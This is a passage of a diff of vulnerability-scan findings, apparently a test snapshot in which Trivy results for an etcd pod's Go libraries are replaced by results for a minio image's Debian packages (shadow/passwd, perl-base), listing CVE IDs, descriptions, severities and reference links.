"https://access.redhat.com/security/cve/CVE-2022-41717", - "https://bugzilla.redhat.com/2092793", - "https://bugzilla.redhat.com/2161274", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", - "https://errata.almalinux.org/9/ALSA-2023-2367.html", - "https://github.com/advisories/GHSA-xrjj-mj9h-534m", - "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", - "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", - "https://go.dev/cl/455635", - "https://go.dev/cl/455717", - "https://go.dev/issue/56350", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", - "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", - "https://linux.oracle.com/cve/CVE-2022-41717.html", - "https://linux.oracle.com/errata/ELSA-2023-2866.html", - "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", - "https://pkg.go.dev/vuln/GO-2022-1144", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "https://access.redhat.com/security/cve/CVE-2013-4235", + "https://access.redhat.com/security/cve/cve-2013-4235", + "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", + "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", + "https://github.com/shadow-maint/shadow/issues/317", + "https://github.com/shadow-maint/shadow/pull/545", + "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", + "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", + "https://security-tracker.debian.org/tracker/CVE-2013-4235", + "https://security.gentoo.org/glsa/202210-26", + "https://ubuntu.com/security/notices/USN-5745-1", + "https://ubuntu.com/security/notices/USN-5745-2", + "https://www.cve.org/CVERecord?id=CVE-2013-4235", ], }, "category": "Vulnerability", - "description": "An attacker can cause excessive memory growth in a Go server accepting HTTP/2 requests. HTTP/2 server connections contain a cache of HTTP header keys sent by the client. While the total number of entries in this cache is capped, an attacker sending very large keys can cause the server to allocate approximately 64 MiB per open connection.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "shadow: TOCTOU (time-of-check time-of-use) race condition when copying and removing directory trees", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "excessive memory growth in a Go server accepting HTTP/2 requests", + "name": "shadow-utils: TOCTOU race conditions by copying and removing directory trees", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-41717", + "value": "https://avd.aquasec.com/nvd/cve-2013-4235", }, { "type": "URL", - "value": "https://access.redhat.com/errata/RHSA-2023:2367", + "value": "https://access.redhat.com/security/cve/CVE-2013-4235", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-41717", + "value": "https://access.redhat.com/security/cve/cve-2013-4235", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2092793", + "value": "https://bugs.launchpad.net/ubuntu/+source/shadow/+bug/1998169", }, { "type": "URL", - "value": "https://bugzilla.redhat.com/2161274", + "value": "https://bugzilla.redhat.com/show_bug.cgi?id=CVE-2013-4235", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41717", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2013-4235", }, { "type": "URL", - "value": "https://errata.almalinux.org/9/ALSA-2023-2367.html", + "value": "https://github.com/shadow-maint/shadow/issues/317", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-xrjj-mj9h-534m", + "value": "https://github.com/shadow-maint/shadow/pull/545", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/618120c165669c00a1606505defea6ca755cdc27 (go1.19.4)", + "value": "https://lists.apache.org/thread.html/rf9fa47ab66495c78bb4120b0754dd9531ca2ff0430f6685ac9b07772%40%3Cdev.mina.apache.org%3E", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/76cad4edc29d28432a7a0aa27e87385d3d7db7a1 (go1.18.9)", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2013-4235", }, { "type": "URL", - "value": "https://go.dev/cl/455635", + "value": "https://security-tracker.debian.org/tracker/CVE-2013-4235", }, { "type": "URL", - "value": "https://go.dev/cl/455717", + "value": "https://security.gentoo.org/glsa/202210-26", }, { "type": "URL", - "value": "https://go.dev/issue/56350", + "value": "https://ubuntu.com/security/notices/USN-5745-1", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU", + "value": "https://ubuntu.com/security/notices/USN-5745-2", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/L_3rmdT0BMU/m/yZDrXjIiBQAJ", + "value": "https://www.cve.org/CVERecord?id=CVE-2013-4235", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2019-19882", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", + "references": [ + "https://access.redhat.com/security/cve/CVE-2019-19882", + "https://bugs.archlinux.org/task/64836", + "https://bugs.gentoo.org/702252", + "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", + "https://github.com/shadow-maint/shadow/pull/199", + "https://github.com/void-linux/void-packages/pull/17580", + "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + "https://security.gentoo.org/glsa/202008-09", + "https://www.cve.org/CVERecord?id=CVE-2019-19882", + ], + }, + "category": "Vulnerability", + "description": "shadow 4.8, in certain circumstances affecting at least Gentoo, Arch Linux, and Void Linux, allows local users to obtain root access because setuid programs are misconfigured. Specifically, this affects shadow 4.8 when compiled using --with-libpam but without explicitly passing --disable-account-tools-setuid, and without a PAM configuration suitable for use with setuid account management tools. This combination leads to account management tools (groupadd, groupdel, groupmod, useradd, userdel, usermod) that can easily be used by unprivileged local users to escalate privileges to root in multiple ways. This issue became much more relevant in approximately December 2019 when an unrelated bug was fixed (i.e., the chmod calls to suidusbins were fixed in the upstream Makefile which is now included in the release version 4.8).", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "shadow-utils: local users can obtain root access because setuid programs are misconfigured", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-41717.html", + "value": "https://avd.aquasec.com/nvd/cve-2019-19882", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2023-2866.html", + "value": "https://access.redhat.com/security/cve/CVE-2019-19882", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-41717", + "value": "https://bugs.archlinux.org/task/64836", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1144", + "value": "https://bugs.gentoo.org/702252", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://github.com/shadow-maint/shadow/commit/edf7547ad5aa650be868cf2dac58944773c12d75", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-41717", + "value": "https://github.com/shadow-maint/shadow/pull/199", + }, + { + "type": "URL", + "value": "https://github.com/void-linux/void-packages/pull/17580", + }, + { + "type": "URL", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2019-19882", + }, + { + "type": "URL", + "value": "https://security.gentoo.org/glsa/202008-09", + }, + { + "type": "URL", + "value": "https://www.cve.org/CVERecord?id=CVE-2019-19882", }, ], - "severity": "MEDIUM", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.0.0-20220412211240-33da011f77ad", - "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-29526", - "installedVersion": "v0.0.0-20210615035016-665e8c7367d1", - "packageName": "golang.org/x/sys", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-29383", + "installedVersion": "1:4.8.1-1", + "packageName": "passwd", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-29526", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", - "https://github.com/advisories/GHSA-p782-xgp4-8hr8", - "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", - "https://github.com/golang/go/issues/52313", - "https://go.dev/cl/399539", - "https://go.dev/cl/400074", - "https://go.dev/issue/52313", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", - "https://linux.oracle.com/cve/CVE-2022-29526.html", - "https://linux.oracle.com/errata/ELSA-2022-5337.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", - "https://pkg.go.dev/vuln/GO-2022-0493", - "https://security.gentoo.org/glsa/202208-02", - "https://security.netapp.com/advisory/ntap-20220729-0001/", - "https://ubuntu.com/security/notices/USN-6038-1", - "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "https://access.redhat.com/security/cve/CVE-2023-29383", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", + "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", + "https://github.com/shadow-maint/shadow/pull/687", + "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", + "https://www.cve.org/CVERecord?id=CVE-2023-29383", + "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", + "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", ], }, "category": "Vulnerability", - "description": "Go before 1.17.10 and 1.18.x before 1.18.2 has Incorrect Privilege Assignment. When called with a non-zero flags parameter, the Faccessat function could incorrectly report that a file is accessible.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "In Shadow 4.13, it is possible to inject control characters into fields provided to the SUID program chfn (change finger). Although it is not possible to exploit this directly (e.g., adding a new user fails because \\n is in the block list), it is possible to misrepresent the /etc/passwd file when viewed. Use of \\r manipulations and Unicode characters to work around blocking of the : character make it possible to give the impression that a new user has been added. In other words, an adversary may be able to convince a system administrator to take the system offline (an indirect, social-engineered denial of service) by demonstrating that "cat /etc/passwd" shows a rogue user account.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "faccessat checks wrong group", + "name": "Improper input validation in shadow-utils package utility chfn", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-29526", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-29526", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-29526", + "value": "https://avd.aquasec.com/nvd/cve-2023-29383", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-p782-xgp4-8hr8", + "value": "https://access.redhat.com/security/cve/CVE-2023-29383", }, { "type": "URL", - "value": "https://github.com/golang/go/commit/f66925e854e71e0c54b581885380a490d7afa30c", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-29383", }, { "type": "URL", - "value": "https://github.com/golang/go/issues/52313", + "value": "https://github.com/shadow-maint/shadow/commit/e5905c4b84d4fb90aefcd96ee618411ebfac663d", }, { "type": "URL", - "value": "https://go.dev/cl/399539", + "value": "https://github.com/shadow-maint/shadow/pull/687", }, { "type": "URL", - "value": "https://go.dev/cl/400074", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2023-29383", }, { "type": "URL", - "value": "https://go.dev/issue/52313", + "value": "https://www.cve.org/CVERecord?id=CVE-2023-29383", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/cve-2023-29383-abusing-linux-chfn-to-misrepresent-etc-passwd/", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/Y5qrqw_lWdU", + "value": "https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=31797", }, + ], + "severity": "LOW", + }, + { + "attributes": { + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2020-16156", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", + "references": [ + "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", + "https://access.redhat.com/security/cve/CVE-2020-16156", + "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", + "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", + "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", + "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", + "https://ubuntu.com/security/notices/USN-5689-1", + "https://ubuntu.com/security/notices/USN-5689-2", + "https://www.cve.org/CVERecord?id=CVE-2020-16156", + ], + }, + "category": "Vulnerability", + "description": "CPAN 2.28 allows Signature Verification Bypass.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", + "mitigation": undefined, + "name": "perl-CPAN: Bypass of verification of signatures in CHECKSUMS files", + "references": [ { "type": "URL", - "value": "https://linux.oracle.com/cve/CVE-2022-29526.html", + "value": "https://avd.aquasec.com/nvd/cve-2020-16156", }, { "type": "URL", - "value": "https://linux.oracle.com/errata/ELSA-2022-5337.html", + "value": "http://blogs.perl.org/users/neilb/2021/11/addressing-cpan-vulnerabilities-related-to-checksums.html", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Q6GE5EQGE4L2KRVGW4T75QVIYAXCLO5X/", + "value": "https://access.redhat.com/security/cve/CVE-2020-16156", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", + "value": "https://blog.hackeriet.no/cpan-signature-verification-vulnerabilities/", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2020-16156", }, { "type": "URL", - "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SD6RYOJII7HRJ6WVORFNVTYNOFY5JDXN/", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-29526", + "value": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/SZ32AJIV4RHJMLWLU5QULGKMMIHYOMDC/", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-0493", + "value": "https://metacpan.org/pod/distribution/CPAN/scripts/cpan", }, { "type": "URL", - "value": "https://security.gentoo.org/glsa/202208-02", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2020-16156", }, { "type": "URL", - "value": "https://security.netapp.com/advisory/ntap-20220729-0001/", + "value": "https://ubuntu.com/security/notices/USN-5689-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-6038-1", + "value": "https://ubuntu.com/security/notices/USN-5689-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-29526", + "value": "https://www.cve.org/CVERecord?id=CVE-2020-16156", }, ], - "severity": "MEDIUM", + "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.3.7", - "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2021-38561", - "installedVersion": "v0.3.6", - "packageName": "golang.org/x/text", - "references": [ - "https://access.redhat.com/security/cve/CVE-2021-38561", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", - "https://deps.dev/advisory/OSV/GO-2021-0113", - "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", - "https://go.dev/cl/340830", - "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", - "https://groups.google.com/g/golang-announce", - "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", - "https://pkg.go.dev/golang.org/x/text/language", - "https://pkg.go.dev/vuln/GO-2021-0113", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31484", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", + "references": [ + "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", + "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", + "https://github.com/andk/cpanpm/pull/175", + "https://metacpan.org/dist/CPAN/changes", + "https://ubuntu.com/security/notices/USN-6112-1", + "https://ubuntu.com/security/notices/USN-6112-2", + "https://www.openwall.com/lists/oss-security/2023/04/18/14", ], }, "category": "Vulnerability", - "description": "golang.org/x/text/language in golang.org/x/text before 0.3.7 can panic with an out-of-bounds read during BCP 47 language tag parsing. Index calculation is mishandled. If parsing untrusted user input, this can be used as a vector for a denial-of-service attack.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "CPAN.pm before 2.35 does not verify TLS certificates when downloading distributions over HTTPS.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "out-of-bounds read in golang.org/x/text/language leads to DoS", + "name": "CPAN.pm before 2.35 does not verify TLS certificates when downloading ...", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2021-38561", + "value": "https://avd.aquasec.com/nvd/cve-2023-31484", }, { "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2021-38561", + "value": "http://www.openwall.com/lists/oss-security/2023/04/29/1", }, { "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-38561", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/3", }, { "type": "URL", - "value": "https://deps.dev/advisory/OSV/GO-2021-0113", + "value": "http://www.openwall.com/lists/oss-security/2023/05/03/5", }, { "type": "URL", - "value": "https://github.com/advisories/GHSA-ppp9-7jff-5vj2", + "value": "http://www.openwall.com/lists/oss-security/2023/05/07/2", }, { "type": "URL", - "value": "https://go.dev/cl/340830", + "value": "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", }, { "type": "URL", - "value": "https://go.googlesource.com/text/+/383b2e75a7a4198c42f8f87833eefb772868a56f", + "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-31484", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce", + "value": "https://github.com/andk/cpanpm/commit/9c98370287f4e709924aee7c58ef21c85289a7f0 (2.35-TRIAL)", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2021-38561", + "value": "https://github.com/andk/cpanpm/pull/175", }, { "type": "URL", - "value": "https://pkg.go.dev/golang.org/x/text/language", + "value": "https://metacpan.org/dist/CPAN/changes", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2021-0113", + "value": "https://ubuntu.com/security/notices/USN-6112-1", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://ubuntu.com/security/notices/USN-6112-2", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2021-38561", + "value": "https://www.openwall.com/lists/oss-security/2023/04/18/14", }, ], "severity": "HIGH", }, { "attributes": { - "fixedVersion": "0.3.8", - "foundIn": "Target: 'usr/local/bin/etcd' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-32149", - "installedVersion": "v0.3.6", - "packageName": "golang.org/x/text", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2011-4116", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", "references": [ - "https://access.redhat.com/security/cve/CVE-2022-32149", - "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - "https://github.com/golang/go/issues/56152", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", - "https://go.dev/cl/442235", - "https://go.dev/issue/56152", - "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", - "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", - "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", - "https://pkg.go.dev/vuln/GO-2022-1059", - "https://ubuntu.com/security/notices/USN-5873-1", - "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "http://www.openwall.com/lists/oss-security/2011/11/04/2", + "http://www.openwall.com/lists/oss-security/2011/11/04/4", + "https://access.redhat.com/security/cve/CVE-2011-4116", + "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", + "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", + "https://rt.cpan.org/Public/Bug/Display.html?id=69106", + "https://seclists.org/oss-sec/2011/q4/238", + "https://www.cve.org/CVERecord?id=CVE-2011-4116", ], }, "category": "Vulnerability", - "description": "An attacker may cause a denial of service by crafting an Accept-Language header which ParseAcceptLanguage will take significant time to parse.", - "location": "scb://trivy/?Namespace=kube-system&Kind=Pod&Name=etcd-kind-control-plane", + "description": "_is_safe in the File::Temp module for Perl does not properly handle symlinks.", + "location": "scb://trivy/?Namespace=securecodebox-system&Kind=Deployment&Name=securecodebox-operator-minio", "mitigation": undefined, - "name": "ParseAcceptLanguage takes a long time to parse complex tags", + "name": "perl: File::Temp insecure temporary file handling", "references": [ { "type": "URL", - "value": "https://avd.aquasec.com/nvd/cve-2022-32149", - }, - { - "type": "URL", - "value": "https://access.redhat.com/security/cve/CVE-2022-32149", - }, - { - "type": "URL", - "value": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-32149", - }, - { - "type": "URL", - "value": "https://github.com/advisories/GHSA-69ch-w2m2-3vjp", - }, - { - "type": "URL", - "value": "https://github.com/golang/go/issues/56152", - }, - { - "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c", - }, - { - "type": "URL", - "value": "https://github.com/golang/text/commit/434eadcdbc3b0256971992e8c70027278364c72c (v0.3.8)", + "value": "https://avd.aquasec.com/nvd/cve-2011-4116", }, { "type": "URL", - "value": "https://go.dev/cl/442235", + "value": "http://www.openwall.com/lists/oss-security/2011/11/04/2", }, { "type": "URL", - "value": "https://go.dev/issue/56152", + "value": "http://www.openwall.com/lists/oss-security/2011/11/04/4", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-announce/c/-hjNw559_tE/m/KlGTfid5CAAJ", + "value": "https://access.redhat.com/security/cve/CVE-2011-4116", }, { "type": "URL", - "value": "https://groups.google.com/g/golang-dev/c/qfPIly0X7aU", + "value": "https://github.com/Perl-Toolchain-Gang/File-Temp/issues/14", }, { "type": "URL", - "value": "https://nvd.nist.gov/vuln/detail/CVE-2022-32149", + "value": "https://nvd.nist.gov/vuln/detail/CVE-2011-4116", }, { "type": "URL", - "value": "https://pkg.go.dev/vuln/GO-2022-1059", + "value": "https://rt.cpan.org/Public/Bug/Display.html?id=69106", }, { "type": "URL", - "value": "https://ubuntu.com/security/notices/USN-5873-1", + "value": "https://seclists.org/oss-sec/2011/q4/238", }, { "type": "URL", - "value": "https://www.cve.org/CVERecord?id=CVE-2022-32149", + "value": "https://www.cve.org/CVERecord?id=CVE-2011-4116", }, ], - "severity": "HIGH", + "severity": "LOW", }, { "attributes": { - "fixedVersion": "0.0.0-20220314234659-1baeb1ce4c0b", - "foundIn": "Target: 'usr/local/bin/etcd-3.5.3' / Class: 'lang-pkgs' / Type: 'gobinary'", - "id": "CVE-2022-27191", - "installedVersion": "v0.0.0-20220131195533-30dcbda58838", - "packageName": "golang.org/x/crypto", + "fixedVersion": undefined, + "foundIn": "Target: 'docker.io/bitnami/minio:2022.9.1-debian-11-r0 (debian 11.4)' / Class: 'os-pkgs' / Type: 'debian'", + "id": "CVE-2023-31486", + "installedVersion": "5.32.1-4+deb11u2", + "packageName": "perl-base", "references": [ - "https://access.redhat.com/errata/RHSA-2022:8008", - "https://access.redhat.com/security/cve/CVE-2022-27191", - "https://bugzilla.redhat.com/1939485", - "https://bugzilla.redhat.com/1989564", - "https://bugzilla.redhat.com/1989570", - "https://bugzilla.redhat.com/1989575", - "https://bugzilla.redhat.com/2064702", - "https://bugzilla.redhat.com/2121445", - "https://bugzilla.redhat.com/2121453", - "https://errata.almalinux.org/9/ALSA-2022-8008.html", - "https://github.com/advisories/GHSA-8c26-wmh5-6g9v", - "https://go.dev/cl/392355", - "https://go.googlesource.com/crypto/+/1baeb1ce4c0b006eff0f294c47cb7617598dfb3d", - "https://groups.google.com/g/golang-announce", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s", - "https://groups.google.com/g/golang-announce/c/-cp44ypCT5s/m/wmegxkLiAQAJ", - "https://linux.oracle.com/cve/CVE-2022-27191.html", - "https://linux.oracle.com/errata/ELSA-2022-8008.html", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DLUJZV3HBP56ADXU6QH2V7RNYUPMVBXQ/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/EZ3S7LB65N54HXXBCB67P4TTOHTNPP5O/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/HHGBEGJ54DZZGTXFUQNS7ZIG3E624YAF/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/J5WPM42UR6XIBQNQPNQHM32X7S4LJTRX/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/QTFOIDHQRGNI4P6LYN6ILH5G443RYYKB/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/RQXU752ALW53OJAF5MG3WMR5CCZVLWW6/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/YHYRQB7TRMHDB3NEHW5XBRG7PPMUTPGV/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/Z55VUVGO7E5PJFXIOVAY373NZRHBNCI5/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZFUNHFHQVJSADNH7EZ3B53CYDZVEEPBP/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZQNPPQWSTP2IX7SHE6TS4SP4EVMI5EZK/", - "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/ZY2SLWOQR4ZURQ7UBRZ7JIX6H6F5JHJR/", - "https://nvd.nist.gov/vuln/detail/CVE-2022-27191", - "https://pkg.go.dev/vuln/GO-2021-0356", - "https://raw.githubusercontent.com/golang/vulndb/df2d3d326300e2ae768f00351ffa96cc2c56cf54/reports/GO-2021-0356.yaml", - "https://security.netapp.com/advisory/ntap-20220429-0002/", - "https://www.cve.org/CVERecord?id=CVE-2022-27191", + "http://www.openwall.com/lists/oss-security/2023/04/29/1", + "http://www.openwall.com/lists/oss-security/2023/05/03/3", + "http://www.openwall.com/lists/oss-security/2023/05/03/5", + "http://www.openwall.com/lists/oss-security/2023/05/07/2", + "https://blog.hackeriet.no/perl-http-tiny-insecure-tls-default-affects-cpan-modules/", + "https://github.com/chansen/p5-http-tiny/pull/153", + "https://hackeriet.github.io/cpan-http-tiny-overview/", + "https://www.openwall.com/lists/oss-security/2023/04/18/14", + 